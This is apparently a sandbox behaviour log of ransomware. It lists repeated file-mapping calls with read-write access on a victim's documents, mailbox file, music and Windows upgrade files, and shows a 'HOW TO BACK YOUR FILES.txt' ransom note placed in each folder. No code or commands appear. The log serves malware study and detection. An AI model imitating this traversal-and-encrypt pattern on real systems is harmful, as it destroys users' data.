Create Mapping C:\Documents and Settings\FD1HVy\My Documents\mYd7cywDST.docx filename = C:\Documents and Settings\FD1HVy\My Documents\mYd7cywDST.docx, protection = PAGE_READWRITE, maximum_size = 58960 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\o30CQCuB8bdhHb.ots filename = C:\Documents and Settings\FD1HVy\My Documents\o30CQCuB8bdhHb.ots, protection = PAGE_READWRITE, maximum_size = 51712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\oyjGs-vsR B9HxSBTe.xlsx filename = C:\Documents and Settings\FD1HVy\My Documents\oyjGs-vsR B9HxSBTe.xlsx, protection = PAGE_READWRITE, maximum_size = 59920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\vJlQBx.xls filename = C:\Documents and Settings\FD1HVy\My Documents\vJlQBx.xls, protection = PAGE_READWRITE, maximum_size = 48736 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\vMA Qdvy.xlsx filename = C:\Documents and Settings\FD1HVy\My Documents\vMA Qdvy.xlsx, protection = PAGE_READWRITE, maximum_size = 93792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\X08ymPxkbPs3266F.docx filename = C:\Documents and Settings\FD1HVy\My Documents\X08ymPxkbPs3266F.docx, protection = PAGE_READWRITE, maximum_size = 84144 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\YCOQqj5kQ9XpLXm.xlsx filename = C:\Documents and Settings\FD1HVy\My Documents\YCOQqj5kQ9XpLXm.xlsx, protection = PAGE_READWRITE, maximum_size = 33968 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\Outlook Files\kkcie@kdj.kd.pst filename = C:\Documents and Settings\FD1HVy\My Documents\Outlook Files\kkcie@kdj.kd.pst, protection = PAGE_READWRITE, maximum_size = 272128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\Outlook Files\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\Outlook Files\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Shapes\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Shapes\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Shapes\_private\folder.ico filename = C:\Documents and Settings\FD1HVy\My Documents\My Shapes\_private\folder.ico, protection = PAGE_READWRITE, maximum_size = 30704 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js, protection = PAGE_READWRITE, maximum_size = 3047616 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\AP 8gy4K.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\AP 8gy4K.mp3, protection = PAGE_READWRITE, maximum_size = 5632 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\hgiHJqZpAffsk9Ayx5.wav filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\hgiHJqZpAffsk9Ayx5.wav, protection = PAGE_READWRITE, maximum_size = 34896 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\Ih S7fXaLxmtXo.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\Ih S7fXaLxmtXo.m4a, protection = PAGE_READWRITE, maximum_size = 7712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\xIKve1epy5TaSZNBJO.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\xIKve1epy5TaSZNBJO.m4a, protection = PAGE_READWRITE, maximum_size = 50000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\BAaa3e1h2lTJYNIOURr.wav filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\BAaa3e1h2lTJYNIOURr.wav, protection = PAGE_READWRITE, maximum_size = 52048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\m3q-E9nfMbEgYl1Pe.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\m3q-E9nfMbEgYl1Pe.m4a, protection = PAGE_READWRITE, maximum_size = 64752 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Te_ga.wav filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Te_ga.wav, protection = PAGE_READWRITE, maximum_size = 90320 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Vpn2Jrp.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Vpn2Jrp.m4a, protection = PAGE_READWRITE, maximum_size = 54624 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\_zhgc_Z.wav filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\_zhgc_Z.wav, protection = PAGE_READWRITE, maximum_size = 4256 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\DxCsbzDxs.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\DxCsbzDxs.mp3, protection = PAGE_READWRITE, maximum_size = 40528 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\y-gmiZ3EVZAMHBqa.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\y-gmiZ3EVZAMHBqa.m4a, protection = PAGE_READWRITE, maximum_size = 17040 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\8a15c9EmXZUQkn3yZLSu.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\8a15c9EmXZUQkn3yZLSu.mp3, protection = PAGE_READWRITE, maximum_size = 53264 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\jIzljgerjD3abNZk.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\jIzljgerjD3abNZk.m4a, protection = PAGE_READWRITE, maximum_size = 3712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\rHULW.wav filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\rHULW.wav, protection = PAGE_READWRITE, maximum_size = 99408 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\Z47-Ha4h.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\Z47-Ha4h.mp3, protection = PAGE_READWRITE, maximum_size = 80128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\9iPxYg1O.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\9iPxYg1O.mp3, protection = PAGE_READWRITE, maximum_size = 17632 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\zin-T7pL1d07aj.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\zin-T7pL1d07aj.m4a, protection = PAGE_READWRITE, maximum_size = 49712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\n7-N9O.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\n7-N9O.mp3, protection = PAGE_READWRITE, maximum_size = 16656 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\sMCkH-pugJ7KJz.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\sMCkH-pugJ7KJz.m4a, protection = PAGE_READWRITE, maximum_size = 8912 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\XBdTL-CUh-k.wav filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\XBdTL-CUh-k.wav, protection = PAGE_READWRITE, maximum_size = 78400 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\QNvdrxGyuyXkTr.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\QNvdrxGyuyXkTr.m4a, protection = PAGE_READWRITE, maximum_size = 86400 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\r3evlg.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\r3evlg.mp3, protection = PAGE_READWRITE, maximum_size = 55440 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\uTrfomCxIjimUGwk.wav filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\uTrfomCxIjimUGwk.wav, protection = PAGE_READWRITE, maximum_size = 56240 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\VnEX 9WW6p4i-Twwhx.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\VnEX 9WW6p4i-Twwhx.m4a, protection = PAGE_READWRITE, maximum_size = 52480 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\YUIsYjlW9J5Ehao1EkEz.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\YUIsYjlW9J5Ehao1EkEz.mp3, protection = PAGE_READWRITE, maximum_size = 4000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\5FKUdmKmT3tyICvOkik4.wav filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\5FKUdmKmT3tyICvOkik4.wav, protection = PAGE_READWRITE, maximum_size = 78048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\PC s _86v5QYC.wav filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\PC s _86v5QYC.wav, protection = PAGE_READWRITE, maximum_size = 10784 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\vK1-.wav filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\vK1-.wav, protection = PAGE_READWRITE, maximum_size = 19072 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\1uqkkl.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\1uqkkl.m4a, protection = PAGE_READWRITE, maximum_size = 12224 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\eevQcTFNQMa.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\eevQcTFNQMa.m4a, protection = PAGE_READWRITE, maximum_size = 40848 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\VTuFplQwRU7kkKmscw.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\VTuFplQwRU7kkKmscw.mp3, protection = PAGE_READWRITE, maximum_size = 37376 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\YIH0Q0N.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\YIH0Q0N.m4a, protection = PAGE_READWRITE, maximum_size = 64032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css, protection = PAGE_READWRITE, maximum_size = 41728 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css, protection = PAGE_READWRITE, maximum_size = 269936 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm, protection = PAGE_READWRITE, maximum_size = 111216 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm, protection = PAGE_READWRITE, maximum_size = 254224 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm, protection = PAGE_READWRITE, maximum_size = 84096 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm, protection = PAGE_READWRITE, maximum_size = 65952 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm, protection = PAGE_READWRITE, maximum_size = 71232 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm, protection = PAGE_READWRITE, maximum_size = 240224 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm, protection = PAGE_READWRITE, maximum_size = 59328 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm, protection = PAGE_READWRITE, maximum_size = 59328 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm, protection = PAGE_READWRITE, maximum_size = 70592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm, protection = PAGE_READWRITE, maximum_size = 70592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm, protection = PAGE_READWRITE, maximum_size = 63872 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm, protection = PAGE_READWRITE, maximum_size = 71520 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm, protection = PAGE_READWRITE, maximum_size = 70160 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm, protection = PAGE_READWRITE, maximum_size = 70160 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm, protection = PAGE_READWRITE, maximum_size = 865424 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm, protection = PAGE_READWRITE, maximum_size = 65648 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm, protection = PAGE_READWRITE, maximum_size = 85344 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm, protection = PAGE_READWRITE, maximum_size = 70256 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm, protection = PAGE_READWRITE, maximum_size = 211024 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm, protection = PAGE_READWRITE, maximum_size = 634864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm, protection = PAGE_READWRITE, maximum_size = 76864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm, protection = PAGE_READWRITE, maximum_size = 84688 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm, protection = PAGE_READWRITE, maximum_size = 67968 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm, protection = PAGE_READWRITE, maximum_size = 68000 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm, protection = PAGE_READWRITE, maximum_size = 82592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm, protection = PAGE_READWRITE, maximum_size = 69072 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm, protection = PAGE_READWRITE, maximum_size = 71824 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm, protection = PAGE_READWRITE, maximum_size = 78944 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm, protection = PAGE_READWRITE, maximum_size = 284624 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm, protection = PAGE_READWRITE, maximum_size = 82736 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm, protection = PAGE_READWRITE, maximum_size = 66928 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm, protection = PAGE_READWRITE, maximum_size = 76320 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm, protection = PAGE_READWRITE, maximum_size = 71168 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm, protection = PAGE_READWRITE, maximum_size = 254928 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm, protection = PAGE_READWRITE, maximum_size = 75920 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm, protection = PAGE_READWRITE, maximum_size = 267504 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm, protection = PAGE_READWRITE, maximum_size = 127024 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm, protection = PAGE_READWRITE, maximum_size = 147920 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm, protection = PAGE_READWRITE, maximum_size = 147920 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\EULA\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml filename = C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml, protection = PAGE_READWRITE, maximum_size = 94656 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\hwcompat.txt filename = C:\Windows10Upgrade\resources\amd64\hwcompat.txt, protection = PAGE_READWRITE, maximum_size = 73904 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\hwexclude.txt filename = C:\Windows10Upgrade\resources\amd64\hwexclude.txt, protection = PAGE_READWRITE, maximum_size = 3088 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\nxquery.cat filename = C:\Windows10Upgrade\resources\amd64\nxquery.cat, protection = PAGE_READWRITE, maximum_size = 10688 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\nxquery.inf filename = C:\Windows10Upgrade\resources\amd64\nxquery.inf, protection = PAGE_READWRITE, maximum_size = 2272 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\amd64\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\dll2\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\dll2\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\dll1\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\dll1\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\2052\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\2052\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\6m3SI3dOGnEdL5ygZWhk.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\6m3SI3dOGnEdL5ygZWhk.m4a, protection = PAGE_READWRITE, maximum_size = 64128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\Af2lBDHgvyvVLDNQ.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\Af2lBDHgvyvVLDNQ.m4a, protection = PAGE_READWRITE, maximum_size = 93040 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\FQWRTCLMeL48zp5.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\FQWRTCLMeL48zp5.mp3, protection = PAGE_READWRITE, maximum_size = 100256 True 1
Fn
